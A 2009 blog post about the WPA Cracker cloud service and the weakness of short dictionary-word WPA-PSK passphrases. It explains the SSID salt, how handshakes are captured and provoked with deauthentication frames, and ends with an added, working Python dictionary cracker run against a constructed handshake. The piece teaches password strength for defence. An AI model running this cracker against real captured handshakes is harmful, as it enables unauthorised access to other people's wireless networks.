Friday, December 11, 2009

Automated WPA Cracking Service Costs $34

A clever researcher launches a service that mostly proves how easy it is to crack a bad WPA password: IDG News Service reports that Moxie Marlinspike, the nom de Net of a security researcher, has launched WPA Cracker, a $34 service that runs a captured WPA/WPA2 Personal handshake against a list of 135 million likely passwords in 20 minutes or less on a cluster of commodity cloud machines. For $17, the same job takes 40 minutes.

Let me be clear: this is a clever and worthwhile addition to penetration testing (pentesting) and network security, and I would gladly pay $34 to prove to someone smug that his or her company password was vulnerable. But it is neither a generic nor a dangerous attack on WPA. Smart companies, likely millions of them, already use account-based network authentication in the form of WPA/WPA2 Enterprise (802.1X with EAP), in which the master key comes out of the authentication exchange rather than from a shared passphrase, so a captured handshake has no passphrase to reveal. Server-side support for WPA/WPA2 Enterprise is de rigueur in enterprise network infrastructure, available from third parties, and built into Windows Server and Mac OS X Server. Home users and small-business users, who run WPA/WPA2 Personal with a single shared password, are the ones most likely to pick a simple one.

The ability to crack WPA-PSK (Pre-Shared Key) passwords used in WPA/WPA2 Personal has been well understood since the IEEE 802.11i committee was first nailing down the details of how a password plus other material would be transmuted into a master key used for encryption: the passphrase and the network name are hashed together thousands of times to produce the pairwise master key, and anyone who captures a handshake can repeat that computation for as many guesses as they like. Researcher Robert Moskowitz let me publish his paper, "Weakness in Passphrase Choice in WPA Interface," way back on 4 November 2003, because he wanted to highlight how Wi-Fi equipment makers were letting down users by not guiding them to pick a strong password. Routers now typically come with configuration software that encourages picking a good password and changing the default network name. (That article is still one of the most-read pages on my site six years later.)

To be crackable by a service like this, a passphrase has to be both short, near the eight-character minimum that WPA allows, and made of dictionary words, including the common substitutions such as a 0 (zero) for the letter O or 3 for E. Longer passphrases built from mixed letters, numbers, and punctuation will remain uncrackable for a very long time: each guess costs the same fixed work (4,096 rounds of HMAC-SHA1), and every additional character multiplies the number of guesses a brute-force attacker must try by the size of the character set, so the total effort grows exponentially with length. (A generic weakness in the WPA-PSK derivation could change that, but none has appeared.)

As Marlinspike notes in the site's FAQ, a WPA-PSK is derived from two inputs: the network's SSID, or name, and the network password. The SSID acts as a salt, extra input mixed with the password so that the same password yields a different key on every differently named network. A salt does not have to be secret to do its job; its job is to stop an attacker from computing one table of keys for common passwords and reusing it against every network, and the SSID does that job here. What a salt cannot do is make any individual password stronger: once the attacker knows a network's SSID, each guess against that network costs exactly what it would have cost unsalted. (This is a different mechanism from TKIP's per-packet key mixing, which fixed WEP's key-reuse problem and is not at issue here.)

However, because the SSID is broadcast in the clear (or can be sniffed when a client associates), an attacker need only capture the four-way handshake that WPA/WPA2 Personal uses to prove both sides hold the same key. The handshake carries both stations' MAC addresses, two random nonces, and a message integrity code computed from the key; with those in hand, every candidate password can be checked offline without touching the network again. The handshake can be provoked by sending a client a forged deauthentication or disassociation frame, which takes only a moment, or an attacker can simply wait for one, since clients rejoin networks quite frequently.

The 20-minute figure is how long it takes to derive a candidate key from each of the 135 million passwords (which Marlinspike says in the FAQ are tuned to the sort people actually use for Wi-Fi), salted with the target network's SSID, and test each result against the captured handshake. WPA Cracker charges the same $17 or $34 whether it recovers the password or reports that the password isn't in the set.

While Marlinspike wouldn't tell IDG which cloud-computing servers he was using, it might be easy to figure out if you do the math. Four hundred of Amazon's "standard on-demand" Linux instances, at $0.085 per instance-hour, cost precisely $34 per hour. That's a little too close to be an accident. Amazon provides an API for launching instances from custom OS images, and bills a full hour at a time, rounding partial hours up. Thus Marlinspike breaks even on a single queued job, but sequentially queued jobs whose average cracking time is under 20 minutes produce a profit, and the 400 instances can start up and shut down while he sleeps.

You can download precomputed sets of common passwords already salted with common SSIDs, but Marlinspike notes in the FAQ that these publicly available tables cover only 1,000 SSIDs and a million words per set. Since anyone who bothers to enable encryption is likely to change the default SSID as well, the salt does its job against such tables: a network with an uncommon name forces the attacker to start the derivation from scratch, which is exactly the work WPA Cracker sells.
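The derivation and offline check described above (the SSID as salt, the captured four-way handshake, one hash-heavy derivation per guess, and SSID-specific precomputed tables) put together as an added example. This is not code from the article, from WPA Cracker, or from Marlinspike. The key derivation follows IEEE 802.11i, but the "captured" handshake is constructed inside the script from a known passphrase (there is no real capture), and the SSIDs, MAC addresses, nonces, and five-word list are made up for illustration. It needs only the Python 3 standard library.

```python
"""Offline WPA/WPA2-PSK dictionary check against a four-way handshake.

Added example. The derivation is 802.11i's; the handshake, SSIDs, MACs,
nonces, and wordlist are constructed here and are not from any real network.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, Iterable, Optional

ITERATIONS = 4096  # PBKDF2 iteration count fixed by 802.11i for WPA-PSK


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256 bits). The SSID is the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), ITERATIONS, 32)


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key: first 16 bytes of the PTK from the 802.11i PRF-512."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, eapol: bytes, key_descriptor_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field (bytes 81..96) zeroed.
    HMAC-MD5 for WPA/TKIP (version 1), HMAC-SHA1 truncated to 16 bytes for WPA2/CCMP (version 2)."""
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    digest = hashlib.md5 if key_descriptor_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


@dataclass(frozen=True)
class Handshake:
    """Everything an attacker sniffs: SSID, both MACs, both nonces, and client message 2."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes  # EAPOL-Key message 2, MIC field included
    key_descriptor_version: int

    @property
    def mic(self) -> bytes:
        return self.eapol[81:97]


def build_message2(snonce: bytes, mic: bytes) -> bytes:
    """Minimal RSN EAPOL-Key message 2 (key info 0x010a: version 2, pairwise, MIC set)."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 7 + b"\x01"  # type, key info, key len, replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")  # IV, RSC, ID, MIC, key data len
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X header: version 1, EAPOL-Key


def constructed_handshake(passphrase: str, ssid: str) -> Handshake:
    """Fabricates a capture by running the real derivation with a known passphrase (constructed data)."""
    ap_mac, sta_mac = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    kck = derive_kck(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, build_message2(snonce, b"\x00" * 16), 2)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, build_message2(snonce, mic), 2)


def check_candidate(hs: Handshake, pmk: bytes) -> bool:
    """Cheap part of a guess: PRF-512 plus one HMAC, then compare against the captured MIC."""
    kck = derive_kck(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
    return hmac.compare_digest(eapol_mic(kck, hs.eapol, hs.key_descriptor_version), hs.mic)


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """One PBKDF2 run (4096 HMAC-SHA1 rounds) per word: this is where the 20 minutes go."""
    for word in wordlist:
        if check_candidate(hs, derive_pmk(word, hs.ssid)):
            return word
    return None


def precompute_pmks(ssid: str, wordlist: Iterable[str]) -> Dict[str, bytes]:
    """A precomputed table is bound to one SSID because the SSID is the salt."""
    return {word: derive_pmk(word, ssid) for word in wordlist}


def crack_with_table(hs: Handshake, table: Dict[str, bytes]) -> Optional[str]:
    """Table lookup skips PBKDF2 entirely, but only pays off if the SSID matches."""
    for word, pmk in table.items():
        if check_candidate(hs, pmk):
            return word
    return None


if __name__ == "__main__":
    WORDS = ["password", "letmein", "p4ssw0rd", "sunshine", "trustno1"]  # constructed wordlist
    hs = constructed_handshake("p4ssw0rd", "HomeNet")
    print("dictionary word:", crack(hs, WORDS))  # p4ssw0rd
    print("strong passphrase:", crack(constructed_handshake("kV7#q2!mZp9$wL3x", "HomeNet"), WORDS))  # None
    print("table for default SSID:", crack_with_table(hs, precompute_pmks("linksys", WORDS)))  # None
    print("table for real SSID:", crack_with_table(hs, precompute_pmks("HomeNet", WORDS)))  # p4ssw0rd
```

The four runs at the bottom are the article's argument in miniature: a dictionary word with a leetspeak substitution falls immediately, a long mixed passphrase survives the same list, and a table precomputed for the default SSID "linksys" is worthless against a network renamed "HomeNet" even though the password is in it. Against a real capture you would fill `Handshake` from a sniffer's output instead of `constructed_handshake`; the check logic is unchanged.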